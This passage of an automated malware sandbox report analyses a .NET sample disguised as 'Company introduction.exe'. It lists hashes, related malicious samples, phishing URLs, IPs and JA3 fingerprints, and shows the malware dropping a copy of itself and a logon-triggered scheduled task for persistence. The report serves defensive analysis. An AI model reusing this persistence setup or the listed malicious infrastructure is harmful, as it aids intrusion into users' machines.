                                                                                                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                  • 149.154.167.220

                                                                                                                                                  ASNs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  ORACLE-BMC-31898USrDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 193.122.6.168
                                                                                                                                                  RFQ_AS0101402025.22025_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                  • 158.101.44.242
                                                                                                                                                  m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 193.122.239.186
                                                                                                                                                  50201668.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                  • 193.122.130.0
                                                                                                                                                  MB263350411AE_1.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • 193.122.130.0
                                                                                                                                                  ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • 158.101.44.242
                                                                                                                                                  http://ubiquitous-twilight-c9292b.netlify.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 129.213.176.209
                                                                                                                                                  slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                  • 193.122.130.0
                                                                                                                                                  MB263350411AE.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • 193.122.130.0
                                                                                                                                                  Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                  • 193.122.130.0
                                                                                                                                                  CLOUDFLARENETUSnew order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 104.26.13.205
                                                                                                                                                  https://qvg.soundestlink.com/ce/c/6783ea8fa36d871b210a875d/678648091eb09f6bc9efe05e/678648224da9c434ec77e1fc?signature=c3a7b24183dde70b3cc2cefa1e1d5f8ff6f1d434aea3b4c4cfdeccd85ad85929Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.18.42.178
                                                                                                                                                  MDE_File_Sample_c404ec52446527b77da6860ca493ea2007ac03d5 (1).zipGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.16.148.130
                                                                                                                                                  https://url.rw/ddj4fGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 1.1.1.1
                                                                                                                                                  Invdoc80.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.21.18.22
                                                                                                                                                  https://padlet.com/prowebsolutions488/new-message-jba6y6w7rg9tzzmnGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.22.67.248
                                                                                                                                                  rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 104.21.96.1
                                                                                                                                                  https://androiddatahost.com/sdsd3Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.21.80.92
                                                                                                                                                  Final-Agreement-Document#808977735.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 188.114.96.3
                                                                                                                                                  EXTERNAL Your company's credit limit has changed!.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.17.25.14
                                                                                                                                                  TELEGRAMRUrDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  http://telenerh-ogjf.icu/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                  • 149.154.167.99
                                                                                                                                                  http://telegroom-nzj.icu/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                  • 149.154.167.99
                                                                                                                                                  https://ofmfy.icu/Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 149.154.167.99
                                                                                                                                                  https://teiegtrm.cc/EN/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                  • 149.154.167.99
                                                                                                                                                  https://teiegtrm.cc/apps.htmlGet hashmaliciousTelegram PhisherBrowse
                                                                                                                                                  • 149.154.167.99
                                                                                                                                                  https://teiegroj.cc/ZH/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                  • 149.154.167.99
                                                                                                                                                  https://teiegroj.cc/apps.htmlGet hashmaliciousTelegram PhisherBrowse
                                                                                                                                                  • 149.154.167.99
                                                                                                                                                  https://teiegrvu.cc/VN/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                  • 149.154.170.96
                                                                                                                                                  https://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 149.154.167.220

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  54328bd36c14bd82ddaa0c04b25ed9adrDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 104.21.48.1
                                                                                                                                                  RFQ_AS0101402025.22025_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                  • 104.21.48.1
                                                                                                                                                  QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 104.21.48.1
                                                                                                                                                  Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • 104.21.48.1
                                                                                                                                                  50201668.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                  • 104.21.48.1
                                                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 104.21.48.1
                                                                                                                                                  MB263350411AE_1.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • 104.21.48.1
                                                                                                                                                  ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • 104.21.48.1
                                                                                                                                                  RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • 104.21.48.1
                                                                                                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 104.21.48.1
                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0enew order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  NLWfV87ouS.dllGet hashmaliciousWannacryBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  542CxvZnI5.dllGet hashmaliciousVirut, WannacryBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/b/?_encoding=UTF8&_encoding=UTF8&node=3024314031&bbn=16435051&pd_rd_w=VSdHJ&content-id=amzn1.sym.01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_p=01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unkGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  https://ziyahid.github.io/netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  http://emeklilereozeldir.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  http://industrious-tomato-ngvkcs.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  http://telegroom-nzj.icu/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                  • 149.154.167.220

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Company introduction.exe.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1216
                                                                                                                                                  Entropy (8bit):5.34331486778365
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FzXKnGk.exe.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1216
                                                                                                                                                  Entropy (8bit):5.34331486778365
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2232
                                                                                                                                                  Entropy (8bit):5.379460230152629
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//Z8vUyus:fLHyIFKL3IZ2KRH9Ouggs
                                                                                                                                                  MD5:5F355422EC7EF08609CC91728781B675
                                                                                                                                                  SHA1:EC2F98559C8DCCD7B3D9454618E092E6993632DF
                                                                                                                                                  SHA-256:5531100331171995A90752EE94B34BBE5DBDD7BCCD4B8530C1D9C77404E8CC9C
                                                                                                                                                  SHA-512:90CD74FEEA54C9A8FA1EDB2B46DDCBC8640F1573064A4F2A147E1BE04AFE84F6F77ADBB98CD108A55ED21E740726911D2196B716B48C2D6EAE93BFF936BA8CBE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axwzueqw.uwj.ps1

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgkdfev1.wn5.psm1

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgdecf5v.gaf.psm1

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ygg41dke.ntw.ps1

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\tmpE629.tmp

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1573
                                                                                                                                                  Entropy (8bit):5.119400958992196
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaC5xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTfvv
                                                                                                                                                  MD5:3A871C4D57EF4E7719A1D1A7FCD88A2C
                                                                                                                                                  SHA1:6554BD589332C5B53C450A1763DB4D59506BC304
                                                                                                                                                  SHA-256:E454E384C15743002C76A1A26BF95816529A57501FE4300C50390549FB71A07F
                                                                                                                                                  SHA-512:E83716CAA579DA5A7EDAF945A90479C2A8102DE860799934785B44D3775D71B99E25755F07F354758B149730C3C7424A9E162C63AC655B9AC6B25B25D616BE92
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\tmpEF32.tmp

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1573
                                                                                                                                                  Entropy (8bit):5.119400958992196
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaC5xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTfvv
                                                                                                                                                  MD5:3A871C4D57EF4E7719A1D1A7FCD88A2C
                                                                                                                                                  SHA1:6554BD589332C5B53C450A1763DB4D59506BC304
                                                                                                                                                  SHA-256:E454E384C15743002C76A1A26BF95816529A57501FE4300C50390549FB71A07F
                                                                                                                                                  SHA-512:E83716CAA579DA5A7EDAF945A90479C2A8102DE860799934785B44D3775D71B99E25755F07F354758B149730C3C7424A9E162C63AC655B9AC6B25B25D616BE92
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                                                  C:\Users\user\AppData\Roaming\FzXKnGk.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):854528
                                                                                                                                                  Entropy (8bit):7.674812972167672
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:XsJN+UVsa/olYFjQyPIoqtpGFjcrpTZ6q6U7jbHXM:83+UfxFsyPIoqcETHFXX
                                                                                                                                                  MD5:10F72E53A2C9F106093C233B56A3A819
                                                                                                                                                  SHA1:E8A63836FF90493559B69A1BC6D6080BA9370A99
                                                                                                                                                  SHA-256:84E892D4627A3A3AA053B30200788BD6942C046D2DADCF5121017A32E10142F2
                                                                                                                                                  SHA-512:CD83C1B9C6128B852F36F97A387C4C89B781F0B0B52702540B12C5878129A0352C3EDC2C12E2FB13E8F159256272338833715C3D78D98C4A195B8E50BD1EBCE2
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                  • Antivirus: Virustotal, Detection: 29%, Browse
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0.............2.... ... ....@.. .......................`............@.....................................O.... ..l....................@....................................................... ............... ..H............text...H.... ...................... ..`.rsrc...l.... ......................@..@.reloc.......@......................@..B........................H........a...N..............@`...........................................0..P............(....(..........s ...%s....o!....%s....o!....%s....o!....%s....o!.........*.0..\........~....r...po"....s#.....~....o$....+..o%.......o.......o....-....,..o......~....r;..po"....*......#..@......".(&....*....0..E........('.....((....s=...().....(*...rw..po+....s....(...........o,.......*............8.......0...........~....r...p.o-...o.....r...p.o-...r...p(/...s'......o)......o.....8.....

                                                                                                                                                  C:\Users\user\AppData\Roaming\FzXKnGk.exe:Zone.Identifier

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):26
                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Entropy (8bit):7.674812972167672
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                  File name:Company introduction.exe
                                                                                                                                                  File size:854'528 bytes
                                                                                                                                                  MD5:10f72e53a2c9f106093c233b56a3a819
                                                                                                                                                  SHA1:e8a63836ff90493559b69a1bc6d6080ba9370a99
                                                                                                                                                  SHA256:84e892d4627a3a3aa053b30200788bd6942c046d2dadcf5121017a32e10142f2
                                                                                                                                                  SHA512:cd83c1b9c6128b852f36f97a387c4c89b781f0b0b52702540b12c5878129a0352c3edc2c12e2fb13e8f159256272338833715c3d78d98c4a195b8e50bd1ebce2
                                                                                                                                                  SSDEEP:24576:XsJN+UVsa/olYFjQyPIoqtpGFjcrpTZ6q6U7jbHXM:83+UfxFsyPIoqcETHFXX
                                                                                                                                                  TLSH:7205D0C03B2A7311DDACBA34853BDDB9A2642D38B00479E26EDD2B5776DD1039A1CF45
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0.............2.... ... ....@.. .......................`............@................................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:0066b49631f8dc38

                                                                                                                                                  Static PE Info

                                                                                                                                                  General

                                                                                                                                                  Entrypoint:0x4d1032
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0x67871BE8 [Wed Jan 15 02:22:32 2025 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:4
                                                                                                                                                  OS Version Minor:0
